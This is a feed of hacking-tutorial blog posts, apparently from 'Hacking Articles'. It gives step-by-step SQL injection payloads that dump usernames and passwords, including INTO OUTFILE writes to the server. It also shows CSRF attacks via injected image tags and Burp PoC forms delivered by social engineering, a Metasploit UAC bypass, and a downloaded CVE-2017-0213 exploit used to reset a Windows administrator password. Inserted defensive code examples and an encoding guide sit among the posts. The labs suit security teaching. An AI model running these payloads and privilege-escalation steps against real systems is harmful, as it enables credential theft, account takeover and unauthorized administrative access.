News from 'Hacking Articles'

Raj Chandel's Blog

Dumping Database using Outfile

6 hours 33 min ago

In our previous article you learned the basic concepts of SQL injection, but in some scenarios that basic knowledge and those tricks will fail. Today we are going to use the SELECT ... INTO OUTFILE statement, which is the easiest way of exporting a table's records into a text file or an Excel file.

This statement lets a user write table information very rapidly into a text file on the server machine. SELECT ... INTO OUTFILE writes the selected rows to a file and allows column and row terminators to be specified to control the output format. The output file is created directly by the MySQL server, so the file name must be given with the path where the user wants the file written on the server host. The file must not already exist on the server; it cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type the following SQL query in the URL:

http://localhost:81/sqli/Less-7/?id=1

From the screenshot you can read "You are in..... Use outfile". Now let's try to break this statement.

OKAY! The query has been broken successfully: we receive an error message when we use a single quote (') to break the query, which confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1'

After a lot of effort the query finally gets fixed. If you look closely, the steps for SQL injection are the same as in the previous chapter; only the technique for fixing the query is different.

http://localhost:81/sqli/Less-7/?id=1')) --+

Now the following query will dump the result into a text file. Here you need to give the path where you want the file written on the server host. The file must not already exist on the server, so always use a new text file when writing out database information.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From the screenshot you can see that it still shows an error message; now open another tab to view the output of the resulting query.

http://localhost:81/sqli/Less-7/

Now add the file name hack1.txt to check the output of the above query.

http://localhost:81/sqli/Less-7/hack1.txt

Hence you can see we get the output of the executed query inside the text file. This also leaves the hack1.txt file saved on the server machine.

Execute the following query to retrieve the database name using union injection, writing to a new text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully got "security" as the database name.

The next query will write all the table names saved inside the database to another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+

http://localhost:81/sqli/Less-7/hack3.txt

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains many columns; I have chosen only two of them for further enumeration.

C1: username

C2: password

At last, execute the following query to read all usernames and passwords from those columns of the users table.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password) from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+

http://localhost:81/sqli/Less-7/hack5.txt

From the screenshot you can read the usernames and passwords saved inside the text file.

Note: you can try the same attack using an Excel file; the attacker only needs to change hack1.txt to hack1.csv, which will save the output into an Excel file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Dumping Database using Outfile appeared first on Hacking Articles.

Categories: Cyber India

CSRF Exploitation using XSS

Sat, 24/Jun/2017 - 16:44

Hello friends! In our previous article we saw how an attacker can attack a web application through a CSRF vulnerability with the help of Burp Suite. Today we are again going to test a CSRF attack, this time with the help of an XSS vulnerability. As we know, with the help of XSS an attacker may be able to read cookies from the same domain, and if the CSRF token is stored in a cookie then the attacker will be able to read the CSRF token of a CSRF-protected post.

Let's have a look at how an attacker can mount a CSRF attack to change the password of the admin account when the web application suffers from a cross-site scripting vulnerability. For this tutorial I used DVWA with its security level set to low.

Suppose that you have found an XSS vulnerability in a web application. Here we are going to use a JavaScript or HTML snippet which will perform the CSRF attack to change the password of the admin account.

An XSS attack can be used to read the cookies and obtain valid tokens, if they are stored in cookies, which then have to be inserted in the malicious script to make CSRF possible. Using an image tag we send a malicious script; inside it I set the new password to 123456.

<img src="/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change">

Now let's check whether the password for admin has been changed or not. Previously the credentials were admin:password; if admin fails to log in to the web server with the previous credentials, then our CSRF attack has succeeded.

From the given screenshot you can see that with admin:password the login fails. Now use the new password 123456 to log in to the web server.

Similarly, there is another web application, bWAPP, where we will demonstrate the same attack using an XSS vulnerability. First you need to choose the bug "Cross-Site Scripting - Reflected (POST)" and set the security level to low.

In the given screenshot the form suffers from an XSS vulnerability; now we are going to generate a script that makes CSRF possible in order to change a user's password. Here we are logged in as bee:bug, and we will try to change that password with the help of cross-site scripting.

Similarly, using an image tag we send a malicious script; inside it I set the new password to hack.

<img src="/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change">

From the screenshot you can see the generated (broken) image icon, which means this form has an XSS flaw; now let's check whether the password has been modified or not for user bee.

Now use the previous credentials bee:bug; if the login fails, it means we have successfully carried out the CSRF attack, and from the screenshot you can see the "invalid credentials or user not activated" message. Now use the new password to log in to the web server.

Conclusion: an XSS vulnerability anywhere in the same domain can lead to a CSRF attack and allows an attacker to remotely control the target's browser with full rights, making CSRF protection useless.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Understanding Encoding (Beginner’s guide)

Thu, 22/Jun/2017 - 17:07

From Wikipedia

This article will describe the different types of processes involved in encoding data.

The term encoded data means wrapped data; the process of encoding transforms data into a different format so that it can be easily understood by different types of systems. For example, ASCII characters are encoded as numbers: 'A' is represented by 65, 'B' by 66, and so on.

As we know, a computer does not understand human languages, therefore we need to encode data into a binary form that computer systems can read easily; hence encoding is very important. It uses schemes that are widely available so that it can simply be reversed. Encoding means data transformation, not data encryption; consequently it does not need a key for decoding.

URL Encoding

The internet only accepts URLs in ASCII format, so URL encoding entails encoding certain characters of the URL character set. This process takes one character and converts it into a character triplet that has a prefix of "%" followed by two hexadecimal digits.

Character   Encoded
:           %3A
/           %2F
#           %23
?           %3F
&           %26
@           %40
%           %25
+           %2B
<space>     %20
;           %3B
=           %3D
$           %24
,           %2C
<           %3C
>           %3E
^           %5E
`           %60
\           %5C
[           %5B
]           %5D
{           %7B
}           %7D
|           %7C
"           %22

Example :

Original URL: http://www.hackingarticles.in

Encoded URL: http%3A%2F%2Fwww.hackingarticles.in

Hexadecimal

Hexadecimal or base 16 is a positional number system which consists of 16 distinct symbols: the numerals 0 to 9, and the letters A to F (in upper or lower case), which represent the numeric values 10 to 15.

Step 1 is to get the decimal value of a letter; this differs between upper and lower case, e.g. A = 65 and a = 97. To find the value of any letter, count up to it from "A" or "a"; the values rise by one each time, e.g. A = 65, B = 66, C = 67 and so on, and a = 97, b = 98, c = 99 and so on.

Step 2: to convert from decimal to hexadecimal, take the decimal value and divide it by 16; the hex value is written as the quotient followed by the remainder (for values up to 255 a single division is enough). So the hex value of 97 will be 61.

Eg:

16 | 97 | 1
   |  6 |

Quotient 6, remainder 1, so 97 in hexadecimal is 61.

Source              R    a    j
Decimal value       82   97   106
Hexadecimal value   52   61   6a

Base64

Base64 is a radix-64 representation of an ASCII (byte) string in which each Base64 digit represents exactly 6 bits of data. Here is how we get it.

Step 1 is to get the decimal value of a letter; this differs between upper and lower case, e.g. A = 65 and a = 97. To find the value of any letter, count up to it from "A" or "a"; the values rise by one each time, e.g. A = 65, B = 66, C = 67 and so on, and a = 97, b = 98, c = 99 and so on.

Step 2 is to divide the decimal value by 2 repeatedly; wherever there is a remainder of 1 it is written as "1", and wherever the remainder is 0 it is written as "0". Continue dividing until you reach 0 or 1 and cannot divide any further. The binary value is the written 1's and 0's read from last to first.

Eg: to get an 8-bit value we prefix "0"s to the value, e.g. 01100001, and this gives us the binary value of "a".

2 | 97 | 1
2 | 48 | 0
2 | 24 | 0
2 | 12 | 0
2 |  6 | 0
2 |  3 | 1
  |  1 | 1

Reading the remainders from bottom to top gives 1100001, i.e. 01100001 in 8 bits.

Step 3: write the values of all the characters in binary and make groups of 6 (6-bit), e.g. the binary value of "Raj" in 8-bit = 01010010 01100001 01101010, and the binary value of "Raj" in 6-bit = 010100 100110 000101 101010.

Step 4: write the decimal value of each 6-bit group from Step 3 by adding the place values wherever there is a 1.

32  16   8   4   2   1   Value
 0   1   0   1   0   0      20
 1   0   0   1   1   0      38
 0   0   0   1   0   1       5
 1   0   1   0   1   0      42

Step 5 – Use the Base64 table to lookup the values we get in Step 4.

The Base64 index table:

Value Char   Value Char   Value Char   Value Char
  0   A        16   Q        32   g        48   w
  1   B        17   R        33   h        49   x
  2   C        18   S        34   i        50   y
  3   D        19   T        35   j        51   z
  4   E        20   U        36   k        52   0
  5   F        21   V        37   l        53   1
  6   G        22   W        38   m        54   2
  7   H        23   X        39   n        55   3
  8   I        24   Y        40   o        56   4
  9   J        25   Z        41   p        57   5
 10   K        26   a        42   q        58   6
 11   L        27   b        43   r        59   7
 12   M        28   c        44   s        60   8
 13   N        29   d        45   t        61   9
 14   O        30   e        46   u        62   +
 15   P        31   f        47   v        63   /

The Base64 encoded value of Raj is UmFq. Encoded in ASCII, the characters R, a, and j are stored as the decimal values 82, 97, and 106; their 8-bit binary values are 01010010, 01100001, and 01101010. These three values are joined together into a 24-bit string, 010100100110000101101010. Groups of 6 bits are converted into individual numbers from left to right. When converting from 8-bit to 6-bit, 0's are added to fill the last slots so that a full group of 6 can be made.

The full conversion of "Raj" to Base64 is shown in Table 1.1, and the individual conversions of "R" and "Ra" of "Raj" are shown in Tables 1.2 and 1.3 to give a breakdown of the process with explanation.

Table 1.1

Text          Raj
ASCII         82        97        106
Bit pattern   01010010  01100001  01101010

In Table 1.2, for the character "R" of "Raj", the values in the Bit pattern section are in 8-bit format and are converted into 6-bit; the decimal values of the 6-bit groups are in the Index section.

The same process is repeated in Table 1.3 for the characters "R" and "a" of "Raj".

For each pair of extra 0's that are added to complete a group of 6, an "=" is added, so the ASCII value of "0 0" is "=".

In Table 1.4, to build further on the logic used in Tables 1.2 and 1.3, "Raaj" is converted to "UmFhag==" in Base64; with the addition of an extra "a", the complexity of the conversion increases. In the Index section we can see the addition of 33, 26 and 32 due to the change in the bit pattern.

Rot13

This is a letter-substitution cipher; its conversion from plain text to cipher text divides the alphabet in half, A to M and N to Z. The first half mirrors the second half and vice versa, so A = N and N = A.

Eg: Rot13 of Raj = Enw

A B C D E F G H I J K L M
N O P Q R S T U V W X Y Z
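The steps of this guide carried through in code: percent-encoding with the character list above, the base-16 and base-2 long division, the 8-bit to 6-bit regrouping against the index table with "=" padding, and the Rot13 half-alphabet mirror. This is an added example, not code from the original post; it generalises the worked "Raj" and "Raaj" cases to any ASCII input and cross-checks itself against the Python standard library.

```python
import base64
import codecs   # rot_13 codec, used only to cross-check
import string
import urllib.parse

# The reserved characters listed in the guide's URL-encoding table (space included).
URL_RESERVED = ':/#?&@%+ ;=$,<>^`\\[]{}|"'


def url_encode(text: str) -> str:
    """Replace each reserved character with '%' followed by two hex digits."""
    return "".join(f"%{ord(ch):02X}" if ch in URL_RESERVED else ch for ch in text)


def to_base(n: int, base: int) -> str:
    """Steps 1-2 of the guide: divide repeatedly, read the remainders last to first."""
    digits = "0123456789abcdef"
    out = ""
    while n:
        n, rem = divmod(n, base)
        out = digits[rem] + out
    return out or "0"


def byte_to_binary(n: int) -> str:
    """8-bit value: prefix '0's until the binary string is eight digits wide."""
    return to_base(n, 2).rjust(8, "0")


# The Base64 index table from the guide, position = value (0..63).
B64_TABLE = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def base64_by_hand(text: str) -> str:
    """Step 3: join the 8-bit patterns and cut them into 6-bit groups, zero-filling
    the last group. Steps 4-5: each group's decimal value selects a table character.
    Every character missing from the final block of four becomes a '='."""
    bits = "".join(byte_to_binary(b) for b in text.encode("ascii"))
    bits += "0" * ((-len(bits)) % 6)              # complete the last 6-bit group
    chars = [B64_TABLE[int(bits[i:i + 6], 2)] for i in range(0, len(bits), 6)]
    return "".join(chars) + "=" * ((-len(chars)) % 4)


def rot13(text: str) -> str:
    """Mirror A-M onto N-Z (and a-m onto n-z); everything else passes through."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr(base + (ord(ch) - base + 13) % 26))
        else:
            out.append(ch)
    return "".join(out)


def worked_example(text: str = "Raj") -> list:
    """Per-character (char, decimal, hex, 8-bit binary) rows like the guide's tables."""
    return [(ch, ord(ch), to_base(ord(ch), 16), byte_to_binary(ord(ch))) for ch in text]


def cross_check(text: str) -> bool:
    """Confirm the hand-rolled Base64 and Rot13 agree with the standard library."""
    return (base64_by_hand(text) == base64.b64encode(text.encode("ascii")).decode()
            and rot13(text) == codecs.encode(text, "rot_13"))


if __name__ == "__main__":
    print(url_encode("http://www.hackingarticles.in"))   # the guide's URL example
    print(worked_example("Raj"))
    print(base64_by_hand("Raj"), base64_by_hand("Raaj"), rot13("Raj"))
    print(urllib.parse.quote("http://www.hackingarticles.in", safe=""))
```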



Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

Thu, 15/Jun/2017 - 22:23

Hello friends! Today we are going to share a new article on how to bypass Windows 10 UAC once you have compromised the victim's system. A new module has been added to Metasploit to achieve admin access on Windows 10.

Attacker: Kali Linux

Target: Windows 10

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It spawns a second shell that has the UAC flag turned off. The module modifies a registry key but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

use exploit/windows/local/bypassuac_fodhelper

msf exploit(bypassuac_fodhelper) > set session 1

msf exploit(bypassuac_fodhelper) > exploit

Hence you can see that another meterpreter session (session 2) has opened, which means we have exploited the target once again; now let's check the user privilege.

meterpreter > getsystem

Awesome!!!! We got admin privilege successfully.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Understanding the CSRF Vulnerability (A Beginner Guide)

Sun, 11/Jun/2017 - 23:02

Today we will see the CSRF attack in different scenarios, like transferring funds and changing a password, but before we see how cross-site request forgery works we need to understand a few concepts.

Tabbed browsing: Tabbed browsing is a feature of web browsers which allows users to view multiple web sites in a single window instead of opening a new browser window. These extra web pages are represented by tabs at the top of the browser window.

Imagine that you are logged in to Facebook and visit a malicious website in the same browser, on a different tab. In the absence of the same-origin policy (SOP), an attacker could go through your profile and other sensitive information with the help of JavaScript: for example, read private messages, send fake messages, or read your chats.

SOP: The same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

XHR: XMLHttpRequest is an API in the form of an object whose methods transfer data between a web browser and a web server. It can:

  • Update a web page without reloading the page
  • Request data from a server after the page has loaded
  • Receive data from a server after the page has loaded
  • Send data to a server in the background

CSRF: Cross-site request forgery, also known as a single-click attack or session traversing, is an attack in which a malicious website sends a request, from a different website, to a web application that the user is already authenticated against. This way an attacker can access functionality in a targeted web application via the victim's already authenticated browser.

If the victim is an ordinary user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the targeted end user is the administrator account, this can compromise the entire web application.

In this article we will test a web application against a CSRF vulnerability with the help of Burp Suite's CSRF PoC.

Source https://www.w3schools.com/xml/xml_http.asp

https://en.wikipedia.org/wiki/Same-origin_policy

Let’s start!!

For this tutorial I used bWAPP, the vulnerable web application, and created a new user raaz with password 123 to log in to the web server.

Now set the security level to low, then from the list of vulnerabilities choose the bug "Cross-Site Request Forgery (Change Secret)" and click on Hack.

If you noticed, in the first image for creating a new user the user "raaz" set his secret value to 123; now if user raaz wishes to change the secret value for his password he can change it from here.

Now let's check how we can test this functionality against a CSRF attack and force raaz to change his secret to the attacker's desired value, that is, set a new secret value without the user's knowledge.

Start Burp Suite to capture the request sent between the browser and the web application.

From the given screenshot you can see we have successfully captured the request inside Burp Suite. Once you have the intercepted data, go to the Action tab, select Engagement tools and finally choose Generate CSRF PoC.

The CSRF PoC generator automatically generates an HTML form page, which you can see in the screenshot below. Click on Copy HTML and open a text document to paste the copied data.

Once you have pasted the HTML code, add your (attacker's) secret value "1234"; you also need to add the user name "raaz", the user whose secret value will be changed. Now save the text document as csrf1.html and use a social engineering technique to deliver the csrf1.html file to the targeted user.

When the victim opens csrf1.html he will find a submit button; as soon as he clicks it, the secret value for the target location is changed without the victim's knowledge.

Here you can observe the result in the screenshot below. Hence in this way a CSRF attack changes the old secret value set by user "raaz".

In the next scenario we are going to test a CSRF attack while transferring an amount from a user's account. You might well be aware of such a scenario: a phone operator, say Airtel, transfers an amount (Rs 500) to recharge a customer's phone and the user receives a message about the transaction; another example is a bank transfer from one user's account to another's.

To learn the CSRF attack in this situation, log in to bWAPP again, then choose the next vulnerability, "Cross-Site Request Forgery (Transfer Amount)", and click on Hack.

In the given screenshot you can see the user has only 1000 EUR in his account, which means a transaction above this amount is not possible (for the user as well as for the attacker). It also shows the user's account number for the transfer and the amount to be transferred.

The procedure for the CSRF attack is the same as above: use Burp Suite to capture the request sent by the browser.

From the given screenshot you can see we have successfully captured the request inside Burp Suite. Once you have the intercepted data, go to the Action tab, select Engagement tools and finally choose Generate CSRF PoC.

Again it will create an HTML form automatically for the intercepted data; now click on Copy HTML at the bottom to copy the generated HTML code for the form.

Open a text document to paste the copied data. Once you have pasted the HTML code, add your (attacker's) amount "100" to be transferred, then save the text document as csrf2.html and use a social engineering technique to deliver the csrf2.html file to the targeted user.

When the victim opens csrf2.html he will find a submit button; as soon as he clicks it, the given amount is transferred without the victim's knowledge.

From the given screenshot you can see that 900 EUR is now left in the user's account, which means 100 EUR has been deducted from it. Hence again we saw the effect of a CSRF attack on an amount transfer from one account to another.

At last we are going to learn the most impactful CSRF attack: changing the password of a user account without his knowledge. Again we log in to bWAPP and choose the bug "Cross-Site Request Forgery (Change Password)" to test the CSRF vulnerability.

Here you can clearly see two text fields, one for the new password and another to confirm it; again we repeat the process using Burp Suite to catch the browser's request.

From the given screenshot you can see we have successfully captured the request inside Burp Suite. Once you have the intercepted data, go to the Action tab, select Engagement tools and finally choose Generate CSRF PoC.

Once again it has generated the HTML code for changing the password; as you can see, Burp Suite itself generates the related HTML form for the destination website, which is an advantage that saves the attacker's time in generating the CSRF HTML form. Again click on Copy HTML to copy the code.

Open a text document to paste the copied data. Once you have pasted the HTML code, add your (attacker's) new password value and confirm password value, then save the text document as csrf3.html and use a social engineering technique to deliver the csrf3.html file to the targeted user.

If you remember, the old password was "123" for user "raaz", and from the screenshot you can see that the new password is now raj.

When the victim opens csrf3.html he will find a submit button; as soon as he clicks it, the password for his account is reset without the victim's knowledge.

Hence you can verify it through the image below, which clearly gives the message "password has been changed".

So today you have seen how we carried out CSRF attacks on a web application in different scenarios with the help of Burp Suite's CSRF PoC.

Try it yourself!!
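What a server-side fix for the password-change forms attacked in this post and in "CSRF Exploitation using XSS" looks like. This is an added example, not DVWA's, bWAPP's or the post's own code: it models the endpoint and a session store in plain Python and replays the page's request shapes against it, the injected <img> GET and a Burp-style PoC form from another origin (both without a token) beside the real form. The parameter name csrf_token, the cookie name sid, SITE_ORIGIN and the sample accounts are this example's assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "http://localhost"   # assumed origin of the protected application


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)    # query string (GET) or form body (POST)
    headers: dict = field(default_factory=dict)


# Constructed stores: session id -> session data, and the sample accounts.
SESSIONS = {}
PASSWORDS = {"admin": "password", "bee": "bug"}


def login(user):
    """Create a session and bind a fresh anti-CSRF token to it on the server,
    so the token is never something a cookie read could hand over."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_hex(16)}
    return sid


def render_change_form(sid):
    """The legitimate page's form: the token travels in the POST body."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="post" action="/change_password">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="password_new"><input name="password_conf">'
            '<button>Change</button></form>')


def change_password(req):
    """Return (status, message); the change happens only if every check passes."""
    # 1. An <img src=...> can only issue a GET, so never change state on GET.
    if req.method != "POST":
        return 405, "password changes are accepted via POST only"
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if sess is None:
        return 401, "not logged in"
    # 2. Browsers attach Origin (or at least Referer) to cross-site form posts.
    origin = req.headers.get("Origin") or req.headers.get("Referer") or ""
    if not origin.startswith(SITE_ORIGIN):
        return 403, "cross-origin request refused"
    # 3. The token must arrive in the body and equal the session's copy
    #    (constant-time compare); a Burp-generated PoC form cannot know it.
    if not hmac.compare_digest(req.params.get("csrf_token", ""), sess["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    # 4. Ordinary validation, as the DVWA/bWAPP forms do.
    new, conf = req.params.get("password_new", ""), req.params.get("password_conf", "")
    if not new or new != conf:
        return 400, "passwords do not match"
    PASSWORDS[sess["user"]] = new
    sess["csrf_token"] = secrets.token_hex(16)   # rotate so a captured form cannot be replayed
    return 200, "password changed"


def demo():
    """Replay the page's request shapes against the handler and collect its verdicts."""
    sid = login("admin")
    token = SESSIONS[sid]["csrf_token"]
    # (a) the injected DVWA image tag: a GET carrying the new password in the query string
    img_tag = Request("GET", "/dvwa/vulnerabilities/csrf/", cookies={"sid": sid},
                      params={"password_new": "123456", "password_conf": "123456", "Change": "Change"},
                      headers={"Referer": SITE_ORIGIN + "/"})
    # (b) a Burp-generated PoC form auto-submitted from the attacker's page: no token
    poc_form = Request("POST", "/change_password", cookies={"sid": sid},
                       params={"password_new": "hack", "password_conf": "hack"},
                       headers={"Origin": "http://attacker.example"})
    # (c) the real form rendered by render_change_form(): token included
    legit = Request("POST", "/change_password", cookies={"sid": sid},
                    params={"csrf_token": token, "password_new": "s3cret!", "password_conf": "s3cret!"},
                    headers={"Origin": SITE_ORIGIN})
    return {"img_tag": change_password(img_tag)[0],
            "poc_form": change_password(poc_form)[0],
            "legit": change_password(legit)[0],
            "replay": change_password(legit)[0],      # same token again, after rotation
            "admin_password": PASSWORDS["admin"]}


if __name__ == "__main__":
    print(demo())
```

Note that the token check holds only while the page itself is free of XSS: an injected script runs in the same origin and can read the token out of the rendered form, which is exactly why the conclusion of "CSRF Exploitation using XSS" treats the XSS flaw as the root problem.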

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Form Based SQL Injection Manually

Fri, 09/Jun/2017 - 22:13

In our previous article we performed form-based SQL injection using sqlmap, but today we are going to perform form-based SQL injection in DHAKKAN manually. There are many examples of login forms, like the Facebook login, the Gmail login and other online accounts which ask you to submit your information as a username and password.

Let's start!!

LESSON 11

This lesson is very similar to lessons 1, 2, 3 and 4; if you are not familiar with those lessons then please go through them from here. You will learn how to perform SQL injection manually, step by step, in order to retrieve the data from inside the database system.

Lesson 11 concerns POST error-based single-quote (') string injection, so when you explore this lab in the browser you will observe that it contains text fields for username and password to log in to the web server. As we are not a genuine user we don't know the correct username and password, but being hackers we always wish to get inside the database with the help of SQL injection. Therefore first we will test whether the database is vulnerable to SQL injection or not.

Since the lesson itself says error-based single-quote (') string, I used a single quote (') to break the query inside the username text field, then clicked on Submit.

Username: '

From the given screenshot you can see we got an error message (in blue), which means the database is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message says.

The right syntax to use near ”” and password=” LIMIT 0,1’

Now we need to fix this query with the help of a # (hash) comment; so after the single quote (') add a hash (#) to make it syntactically correct.

Username: ' #

From the screenshot you can see it shows a failed login attempt, though we have successfully fixed the blue error message.

Now whatever statement you insert between ' and # will be executed successfully, with a result according to it. To find out the number of columns used in the backend query, we'll use the ORDER BY clause.

Username: ' order by 1 #

Username: ' order by 2 #

Username: ' order by 3 #

From the screenshot you can see I received an error at order by 3, which means only two columns are used in the backend query.

Similarly, insert a union select query between ' and # to select both records.

Username: ' union select 1,2 #

From the screenshot you can see it also shows a successful login; now let's retrieve data from inside it.

The next query will fetch the database name; it is the same as in lesson 1, and from the screenshot you can read the database name "security".

Username: ' union select 1,database() #

Through the query given below we will be able to fetch the table names present inside the database.

Username: ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

Username: ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

At last, execute the following query to read all usernames and passwords inside the users table.

Username: ' union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but every user's credentials; now use them to log in.

This is all about single-quote string error-based injection in lesson 11.

Lesson 12

In some scenarios you will try to use a single-quote string to test for SQL vulnerability, or go further in order to break the query even after knowing that the database is vulnerable, but you will not be able to break the query and receive an error message, because the developer might have blacklisted the single quote (') in the backend query.

Lesson 12 is similar to the previous lesson 11, but here you will face failure if you use single quotes to break the query, since the chapter is about POST error-based double-quote string ("). Thus I used a double quote (") to break the query inside the username text field, then clicked on Submit.

Username: "

From the given screenshot you can see we got an error message (in blue), which means the database is vulnerable to SQL injection.

So when we break the query we get an error message; now let me explain what this error message says.

The right syntax to use near ‘”””) and password=(“”) LIMIT 0,1’

Now we need to fix this query with the help of a closing parenthesis ) and a # (hash) comment; so after the double quote (") add a closing parenthesis ) and a hash (#) to make it syntactically correct.

Username: ") #

From the screenshot you can see it shows a failed login attempt, though we have successfully fixed the blue error message.

Now whatever statement you insert between ") and # will be executed successfully, with a result according to it. To find out the number of columns used in the backend query, we'll use the ORDER BY clause.

Username: ") order by 3 #

From the screenshot you can see I received an error at order by 3, which means only two columns are used in the backend query.

Similarly, insert a union select query between ") and # to select both records.

Username: ") union select 1,2 #

From the screenshot you can see it also shows a successful login; let's now retrieve data from inside it.

The next query will fetch the database name; it is the same as in lesson 1, and from the screenshot you can read the database name "security".

Username: ") union select 1,database() #

Through the query given below we will be able to fetch the table names present inside the database.

Username: ") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

Username: ") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

There are many columns, but we are interested in username and password only.

At last, execute the following query to read all usernames and passwords inside the users table.

Username: ") union select group_concat(username),group_concat(password) from users #

Hence you can see we have retrieved not just a single user's credentials but every user's credentials; now use them to log in.

This is all about double quotes string error based injection in lesson 12.
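Why the Less-7 payloads of "Dumping Database using Outfile" and the lesson 11 login payloads above work, and why binding the value as a parameter stops both. This is an added example, not the sqli-labs/DHAKKAN code or the post's own: it recreates a three-column users table with constructed rows in an in-memory SQLite database and runs the page's two query shapes, once built by string concatenation and once with a bound parameter. MySQL-only pieces are left out: SQLite has no INTO OUTFILE, and the page's # and --+ comments are written as a plain -- comment, which both engines accept.

```python
import sqlite3

# Constructed rows standing in for the lab's security.users table.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


# --- Vulnerable shapes: the request value is pasted straight into the SQL text. ---
def less7_sql_unsafe(user_id):
    """Less-7 wraps the id as (('...')): the payload must close the quote and both parentheses."""
    return f"SELECT * FROM users WHERE id=(('{user_id}')) LIMIT 0,1"


def lesson11_sql_unsafe(username, password):
    """Lesson 11 login: single-quoted strings, cut short by a comment."""
    return (f"SELECT username, password FROM users "
            f"WHERE username='{username}' AND password='{password}' LIMIT 0,1")


def run(conn, sql):
    return conn.execute(sql).fetchall()


# --- Hardened shapes: the same statements, with the value bound as a parameter. ---
def less7_rows_safe(conn, user_id):
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchall()


def login_safe(conn, username, password):
    return conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 0,1",
        (username, password)).fetchall()


# The page's payloads, with the MySQL comment written as '--'.
LESS7_PAYLOAD = "1')) union select 1,2,3 --"
LESSON11_PAYLOAD = "' union select group_concat(username),group_concat(password) from users --"


def demo():
    conn = make_db()
    return {
        # concatenation: the UNION row comes back together with the real one
        "less7_unsafe": run(conn, less7_sql_unsafe(LESS7_PAYLOAD)),
        # concatenation: one row holding every username and every password
        "lesson11_unsafe": run(conn, lesson11_sql_unsafe(LESSON11_PAYLOAD, "x")),
        # bound parameter: the payload is compared as a literal value and matches nothing
        "less7_safe": less7_rows_safe(conn, LESS7_PAYLOAD),
        "lesson11_safe": login_safe(conn, LESSON11_PAYLOAD, "x"),
        # an honest value still works through the hardened path
        "honest": less7_rows_safe(conn, "1"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```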

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Bypass Admin access through guest Account in windows 10

Thu, 08/Jun/2017 - 11:43

Open a command prompt and check the Windows user account status using the "whoami" command.

The account name is "joe" and the account status is 'DefaultAccount', which is a non-administrator account type.

Try changing the administrator password using the 'net user' command. You will see the error 'Access is denied'.

Now download "CVE-2017-0213_x64" from here and unzip it on your PC. Go to the folder, find the .exe file and double-click it to run it.

The moment you double-click it, it automatically opens a new command prompt with administrator privileges.

Use the 'net user' command to change the administrator account's password. The message 'The command completed successfully' will appear. You have now successfully changed the administrator account's password.

Author: Abhimanyu Dev is an Aspiring Cyber Security Expert. Contact Here


